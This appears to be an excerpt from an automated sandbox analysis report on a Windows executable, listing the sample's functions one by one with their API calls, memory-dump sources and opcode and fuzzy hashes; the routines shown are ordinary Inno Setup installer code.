                                                                                      • Opcode ID: 4583f237df22b439ee34a1a79ec62ce4162a2c4c0b032f6043df3341da82d5c7
                                                                                      • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                                      • Opcode Fuzzy Hash: 4583f237df22b439ee34a1a79ec62ce4162a2c4c0b032f6043df3341da82d5c7
                                                                                      • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                                      Function 00450088 Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetEndOfFile.KERNEL32(?,?,0045AA1E,00000000,0045ABA9,?,00000000,00000002,00000002), ref: 0045008F
                                                                                        • Part of subcall function 0044FE10: GetLastError.KERNEL32(0044FC2C,0044FED2,?,00000000,?,00492588,00000001,00000000,00000002,00000000,004926E9,?,?,00000005,00000000,0049271D), ref: 0044FE13
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLast
                                                                                      • String ID:
                                                                                      • API String ID: 734332943-0
                                                                                      • Opcode ID: 857a2ef5c33fcabe859aa2781a1519cd0b5291b8658590954683ea0b80d8510a
                                                                                      • Instruction ID: 5fd336f37560a3562a1f9a64c462d12011a30875c45227d907a3aa1d5a9b5e2e
                                                                                      • Opcode Fuzzy Hash: 857a2ef5c33fcabe859aa2781a1519cd0b5291b8658590954683ea0b80d8510a
                                                                                      • Instruction Fuzzy Hash: 35C04C65300110479F00A6BE95C1A1763D95F083063104866BA04CF257D669D8544A18
                                                                                      Function 00407210 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetCurrentDirectoryA.KERNEL32(00000000,?,00492516,00000000,004926E9,?,?,00000005,00000000,0049271D,?,?,00000000), ref: 0040721B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectory
                                                                                      • String ID:
                                                                                      • API String ID: 1611563598-0
                                                                                      • Opcode ID: 116f646fca034a371e6a5c157b9d4efecc0deabf7e2bcd6bcee3aaaef58023bf
                                                                                      • Instruction ID: c18bf430a4858a09d5fd0626d157798880aaaa8ea81a5298b6cf69089c3012d4
                                                                                      • Opcode Fuzzy Hash: 116f646fca034a371e6a5c157b9d4efecc0deabf7e2bcd6bcee3aaaef58023bf
                                                                                      • Instruction Fuzzy Hash: B0B012E03D161B27CA0079FE4CC191A01CC46292163501B3A3006E71C3D83CC8080514
                                                                                      Function 0042E24B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(?,0042E269), ref: 0042E25C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode
                                                                                      • String ID:
                                                                                      • API String ID: 2340568224-0
                                                                                      • Opcode ID: 7fad5ebe009d69c2099675b3e000f1c062c351dec5b4fb3cd432c824ae70c241
                                                                                      • Instruction ID: b0804e078831a813d9aa2463563e291fc03c9a68ee142e2bda9a21ea894dad8b
                                                                                      • Opcode Fuzzy Hash: 7fad5ebe009d69c2099675b3e000f1c062c351dec5b4fb3cd432c824ae70c241
                                                                                      • Instruction Fuzzy Hash: AFB09B7670C600DDB709D6D6745552D63D8D7C47207E145B7F001D2580D93C58004928
                                                                                      Function 0041655C Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 15102f7382d34fed751781a5022c55e4c44b9a191595ad2a6c0bef55f1a25186
                                                                                      • Instruction ID: 444a78761fbc6a727879d8c4239369b0bde5fc0390465f01f64749401816922a
                                                                                      • Opcode Fuzzy Hash: 15102f7382d34fed751781a5022c55e4c44b9a191595ad2a6c0bef55f1a25186
                                                                                      • Instruction Fuzzy Hash: CDA002756015049ADE04A7A5C849F662298BB44204FC915F971449B092C53C99008E58
                                                                                      Function 0044815C Relevance: 1.4, APIs: 1, Instructions: 158COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4ab2ea1812401c856e0cde9d0c05d2385f19664b13b8620937c6159cc733bb41
                                                                                      • Instruction ID: d201100ca80ec2f8cbfe3f56f823717f17ab321979d0d2a0415f45e630f29b9c
                                                                                      • Opcode Fuzzy Hash: 4ab2ea1812401c856e0cde9d0c05d2385f19664b13b8620937c6159cc733bb41
                                                                                      • Instruction Fuzzy Hash: CD518674E042459FDB00EFA9C482AAEBBF5EF49704F5041BEE500A7351DB789E41CB98
                                                                                      Function 0045C348 Relevance: 1.3, APIs: 1, Instructions: 62memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0045C3D8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      • Opcode ID: 76fbdefa84b6e6646576d37aa534d5687847a51f5d406797e85eb89dfb11de70
                                                                                      • Instruction ID: 7994756c429da8fd341528b1115bd972bbd87915911d1c28c7d9b705713d9cd5
                                                                                      • Opcode Fuzzy Hash: 76fbdefa84b6e6646576d37aa534d5687847a51f5d406797e85eb89dfb11de70
                                                                                      • Instruction Fuzzy Hash: 641163716043089FD700AE55C8C1B4B3795AF8475AF05806AFD589B2C7DB38E848CB6A
                                                                                      Function 0041F334 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED14,?,004237FF,00423B7C,0041ED14), ref: 0041F352
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      • Opcode ID: fcc5bb2b52a6c868320fd556f825bdddd6823e0008dba192f27ebe0d5c6033d0
                                                                                      • Instruction ID: b4617262a153a49870252b9da37c83347ffd54b91452f412ea0f349906787434
                                                                                      • Opcode Fuzzy Hash: fcc5bb2b52a6c868320fd556f825bdddd6823e0008dba192f27ebe0d5c6033d0
                                                                                      • Instruction Fuzzy Hash: 361118742407099BC710DF59D881B86FBE5EB983A0B10C53BED688B385D378E945CBA9
                                                                                      Function 00451BCC Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(00000000,00451C35), ref: 00451C17
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1452528299-0
                                                                                      • Opcode ID: ab3637484c69f1e3a9289275503d70efe7f0fad7bd619f5ef2b617ba719f0b94
                                                                                      • Instruction ID: 9b046278fcf2f54c8895181bb84fa4e67d3ca0abe95595291a9aaadc5344c142
                                                                                      • Opcode Fuzzy Hash: ab3637484c69f1e3a9289275503d70efe7f0fad7bd619f5ef2b617ba719f0b94
                                                                                      • Instruction Fuzzy Hash: 7B017036604248AF8B11DF69AC105EEF7E8EB4932072082B7FC64C3352D7754D05D694
                                                                                      Function 0045C2F0 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,0045C3CE), ref: 0045C307
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 1263568516-0
                                                                                      • Opcode ID: 1db0cbd719025b65296d728f72a94704870e37dd70070be8469bdcaf82232f5c
                                                                                      • Instruction ID: 3bb3114e2640d79ee9d1f6c6c170ec04299b672b50bb43f7844af23f30410e64
                                                                                      • Opcode Fuzzy Hash: 1db0cbd719025b65296d728f72a94704870e37dd70070be8469bdcaf82232f5c
                                                                                      • Instruction Fuzzy Hash: 6CD0E9B17557045FDF90EE798CC1B0237D8BB48741F5044666D04DB286E674E8048A18
                                                                                      Function 00406EB0 Relevance: 1.3, APIs: 1, Instructions: 3COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: ce9819a0c299784ac39983e171dfc3d0d3373cd0e3bd5e96c40e619c76bc7acf
                                                                                      • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                                      • Opcode Fuzzy Hash: ce9819a0c299784ac39983e171dfc3d0d3373cd0e3bd5e96c40e619c76bc7acf
                                                                                      • Instruction Fuzzy Hash:

                                                                                      Non-executed Functions

                                                                                      Function 0044B08C Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 252libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0044B038: GetVersionExA.KERNEL32(00000094), ref: 0044B055
                                                                                      • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F1A9,00493215), ref: 0044B0B3
                                                                                      • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B0CB
                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B0DD
                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B0EF
                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B101
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B113
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B125
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B137
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B149
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B15B
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B16D
                                                                                      • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B17F
                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B191
                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B1A3
                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B1B5
                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B1C7
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B1D9
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B1EB
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B1FD
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B20F
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B221
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B233
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B245
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B257
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B269
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B27B
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B28D
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B29F
                                                                                      • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B2B1
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B2C3
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B2D5
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B2E7
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B2F9
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B30B
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B31D
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B32F
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B341
                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B353
                                                                                      • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B365
                                                                                      • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B377
                                                                                      • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B389
                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B39B
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B3AD
                                                                                      • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B3BF
                                                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B3D1
                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B3E3
                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B3F5
                                                                                      • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B407
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoadVersion
                                                                                      • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                      • API String ID: 1968650500-2910565190
                                                                                      • Opcode ID: c0b6a7321769edc8054774f6e1a4a7cc645fbf4eca71de10d65dcd89c53b7c41
                                                                                      • Instruction ID: fe7ec38607b22d39bed663b2d58cef56837bfbcccade8a066643eb3a06087c6f
                                                                                      • Opcode Fuzzy Hash: c0b6a7321769edc8054774f6e1a4a7cc645fbf4eca71de10d65dcd89c53b7c41
                                                                                      • Instruction Fuzzy Hash: 3B91E3B0A40B50EFEF00EBF598C6A2636A8EB15B18B15457BB444EF296C778D804CF5D
                                                                                      Function 00456D8C Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 186pipeprocessfileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00456DF3
                                                                                      • QueryPerformanceCounter.KERNEL32(02313858,00000000,00457086,?,?,02313858,00000000,?,00457782,?,02313858,00000000), ref: 00456DFC
                                                                                      • GetSystemTimeAsFileTime.KERNEL32(02313858,02313858), ref: 00456E06
                                                                                      • GetCurrentProcessId.KERNEL32(?,02313858,00000000,00457086,?,?,02313858,00000000,?,00457782,?,02313858,00000000), ref: 00456E0F
                                                                                      • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00456E85
                                                                                      • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02313858,02313858), ref: 00456E93
                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00494AB0,00000003,00000000,00000000,00000000,00457042), ref: 00456EDB
                                                                                      • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00457031,?,00000000,C0000000,00000000,00494AB0,00000003,00000000,00000000,00000000,00457042), ref: 00456F14
                                                                                        • Part of subcall function 0042D7A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D7B3
                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00456FBD
                                                                                      • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00456FF3
                                                                                      • CloseHandle.KERNEL32(000000FF,00457038,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 0045702B
                                                                                        • Part of subcall function 004520A4: GetLastError.KERNEL32(00000000,00452B15,00000005,00000000,00452B4A,?,?,00000000,00496628,00000004,00000000,00000000,00000000,?,00492A61,00000000), ref: 004520A7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                      • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                      • API String ID: 770386003-3271284199
                                                                                      • Opcode ID: 53890445295be3d3d31e52727ea490adc7ccb43dce6168ff118a2784991df1db
                                                                                      • Instruction ID: f6538b9f74412226b669bfece35f7f8b6dba794c0ca87bd4e30d5109fc12bfbf
                                                                                      • Opcode Fuzzy Hash: 53890445295be3d3d31e52727ea490adc7ccb43dce6168ff118a2784991df1db
                                                                                      • Instruction Fuzzy Hash: 49716470A04744AFDB20DB69DC41B5EBBF8AB05705F5084BAF908EB282D7785948CF69
                                                                                      Function 0045B29C Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 182libraryloadermemoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetVersion.KERNEL32 ref: 0045B2B6
                                                                                      • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045B2D6
                                                                                      • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045B2E3
                                                                                      • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045B2F0
                                                                                      • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045B2FE
                                                                                        • Part of subcall function 0045B1A4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045B243,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045B21D
                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045B4F1,?,?,00000000), ref: 0045B3B7
                                                                                      • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045B4F1,?,?,00000000), ref: 0045B3C0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                      • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                      • API String ID: 59345061-4263478283
                                                                                      • Opcode ID: 1d806d9dda6068bb291ca6d6d76056618574950846b2f0729205e6ddb2b5ae31
                                                                                      • Instruction ID: c7fa785e835f4f31fbb174cc3c8bee0aea38d4a0e272f0ec20846287379b14aa
